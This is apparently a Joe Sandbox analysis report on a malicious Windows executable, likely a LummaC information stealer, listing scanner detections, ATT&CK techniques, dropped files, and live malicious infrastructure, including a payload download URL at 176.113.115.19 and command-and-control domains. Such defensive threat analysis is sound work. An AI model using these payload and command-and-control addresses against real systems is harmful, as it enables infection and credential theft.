        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218BC
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BE6
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02151B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02151B23
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02150E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02150E4D
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        12
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        4
        Obfuscated Files or Information
        LSASS Memory22
        File and Directory Discovery
        Remote Desktop Protocol41
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)Logon Script (Windows)22
        Software Packing
        Security Account Manager44
        System Information Discovery
        SMB/Windows Admin Shares1
        Screen Capture
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDS131
        Security Software Discovery
        Distributed Component Object Model3
        Clipboard Data
        124
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets1
        Virtualization/Sandbox Evasion
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Process Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Mmm7GmDcR4.exe45%ReversingLabsWin32.Trojan.Generic
        Mmm7GmDcR4.exe42%VirustotalBrowse
        Mmm7GmDcR4.exe100%AviraHEUR/AGEN.1306978
        Mmm7GmDcR4.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exe42%ReversingLabs
        C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe42%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://176.113.115.19/ScreenUpdateSync.exe%D0%Avira URL Cloudsafe
        http://176.113.115.19/ScreenUpdateSync.exetD0%Avira URL Cloudsafe
        https://skidjazzyric.click/apik100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE0%Avira URL Cloudsafe
        https://post-to-me.com/track_prt.php?sub=0&cc=DE100%Avira URL Cloudmalware
        https://skidjazzyric.click/d8100%Avira URL Cloudmalware
        https://post-to-me.com/track_prt.php?sub=0&cc=DEP100%Avira URL Cloudmalware
        https://post-to-me.com/track_prt.php?sub=100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exe3%0%Avira URL Cloudsafe
        https://post-to-me.com/100%Avira URL Cloudmalware
        http://176.113.115.19/0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        post-to-me.com
        104.21.56.70
        truefalse
          high
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            high
            skidjazzyric.click
            104.21.32.1
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              robinsharez.shopfalse
                high
                versersleep.shopfalse
                  high
                  https://skidjazzyric.click/apifalse
                    high
                    soundtappysk.shopfalse
                      high
                      crowdwarek.shopfalse
                        high
                        skidjazzyric.clickfalse
                          high
                          handscreamny.shopfalse
                            high
                            apporholis.shopfalse
                              high
                              https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                              • Avira URL Cloud: malware
                              unknown
                              chipdonkeruz.shopfalse
                                high
                                femalsabler.shopfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://post-to-me.com/track_prt.php?sub=&cc=DEMmm7GmDcR4.exe, 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtab3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://skidjazzyric.click/3B5A.tmp.exe, 00000003.00000003.1405892976.0000000000849000.00000004.00000020.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1405892976.0000000000882000.00000004.00000020.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000002.1675015771.0000000000839000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://skidjazzyric.click/apik3B5A.tmp.exe, 00000003.00000003.1423380064.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1423266241.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1423536222.0000000002EC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.rootca1.amazontrust.com/rootca1.crl03B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://176.113.115.19/ScreenUpdateSync.exe%DMmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://upx.sf.netAmcache.hve.7.drfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.rootca1.amazontrust.com0:3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.ecosia.org/newtab/3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://176.113.115.19/ScreenUpdateSync.exeMmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ac.ecosia.org/autocomplete?q=3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://176.113.115.19/ScreenUpdateSync.exetDMmm7GmDcR4.exe, 00000000.00000002.3769724782.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://post-to-me.com/track_prt.php?sub=Mmm7GmDcR4.exefalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWAREMmm7GmDcR4.exe, 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://skidjazzyric.click/d83B5A.tmp.exe, 00000003.00000003.1405892976.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://x1.c.lencr.org/03B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/03B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://176.113.115.19/ScreenUpdateSync.exe3%Mmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?3B5A.tmp.exe, 00000003.00000003.1441314346.0000000002F05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://post-to-me.com/Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://post-to-me.com/track_prt.php?sub=0&cc=DEPMmm7GmDcR4.exe, 00000000.00000002.3769724782.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Mmm7GmDcR4.exe, 00000000.00000003.3641286720.0000000000500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.all3B5A.tmp.exe, 00000003.00000003.1443206084.000000000317D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=3B5A.tmp.exe, 00000003.00000003.1406895218.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407000087.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1406787317.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://176.113.115.19/Mmm7GmDcR4.exe, 00000000.00000003.1368282347.000000000052A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.32.1
                                                                          skidjazzyric.clickUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.21.56.70
                                                                          post-to-me.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          176.113.115.19
                                                                          unknownRussian Federation
                                                                          49505SELECTELRUfalse
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1587637
                                                                          Start date and time:2025-01-10 16:08:35 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 8m 55s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:12
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Mmm7GmDcR4.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:c4a14694e0fb534e9cbfbff50be90ba3.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/7@2/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 93%
                                                                          • Number of executed functions: 45
                                                                          • Number of non-executed functions: 338
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.45, 4.245.163.56, 23.206.229.209, 40.126.32.74
                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          10:09:27API Interceptor8799813x Sleep call for process: Mmm7GmDcR4.exe modified
                                                                          10:09:31API Interceptor5x Sleep call for process: 3B5A.tmp.exe modified
                                                                          10:09:59API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.32.1QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                          • www.mzkd6gp5.top/3u0p/
                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                          • redroomaudio.com/administrator/index.php
                                                                          104.21.56.70xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                            DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                              Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                  xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                    K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                      IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                        J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                          hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                            DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                              176.113.115.19xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              s-part-0017.t-0009.t-msedge.nethCkkM0lH0P.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 13.107.246.45
                                                                                              RSLMZxqebl.exeGet hashmaliciousFormBookBrowse
                                                                                              • 13.107.246.45
                                                                                              nRNzqQOQwk.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 13.107.246.45
                                                                                              PO-0005082025 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                              • 13.107.246.45
                                                                                              PO-0005082025 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                              • 13.107.246.45
                                                                                              Shipping Document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                              • 13.107.246.45
                                                                                              1712226379134618467.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                              • 13.107.246.45
                                                                                              https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGNGet hashmaliciousUnknownBrowse
                                                                                              • 13.107.246.45
                                                                                              https://www.filemail.com/d/rxythqchkhluipl?skipreg=trueGet hashmaliciousUnknownBrowse
                                                                                              • 13.107.246.45
                                                                                              https://eu.jotform.com/app/250092704521347Get hashmaliciousUnknownBrowse
                                                                                              • 13.107.246.45
                                                                                              post-to-me.comxCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.179.207
                                                                                              Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.179.207
                                                                                              skidjazzyric.clickuU6IvUPN39.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.96.1
                                                                                              xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.48.1
                                                                                              fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.80.1
                                                                                              Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.64.1
                                                                                              DPlvBkg4aj.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.80.1
                                                                                              xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.80.1
                                                                                              GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.64.1
                                                                                              ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.64.1
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUShttps://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3fGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 188.114.96.3
                                                                                              DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 104.26.12.205
                                                                                              RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                              • 104.26.13.205
                                                                                              ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 104.21.112.1
                                                                                              https://booking.extrantelabelason.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                              • 104.18.86.42
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              https://eu.boxif.xyzGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              7DpzcPcsTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.74.152
                                                                                              B8FnDUj8hy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.26.13.205
                                                                                              B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.48.1
                                                                                              SELECTELRU1In8uYbvZJ.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 176.113.115.177
                                                                                              xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              nYT1CaXH9N.ps1Get hashmaliciousAmadeyBrowse
                                                                                              • 176.113.115.131
                                                                                              iy2.dat.exeGet hashmaliciousXWormBrowse
                                                                                              • 176.113.115.170
                                                                                              z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                              • 82.148.27.5
                                                                                              CLOUDFLARENETUShttps://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3fGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 188.114.96.3
                                                                                              DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 104.26.12.205
                                                                                              RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                              • 104.26.13.205
                                                                                              ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 104.21.112.1
                                                                                              https://booking.extrantelabelason.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                              • 104.18.86.42
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              https://eu.boxif.xyzGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              7DpzcPcsTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.74.152
                                                                                              B8FnDUj8hy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.26.13.205
                                                                                              B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 104.21.48.1
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.32.1
                                                                                              davies.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.32.1
                                                                                              FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.32.1
                                                                                              DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
                                                                                              PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.32.1
                                                                                              fghj.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.32.1
                                                                                              CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.32.1
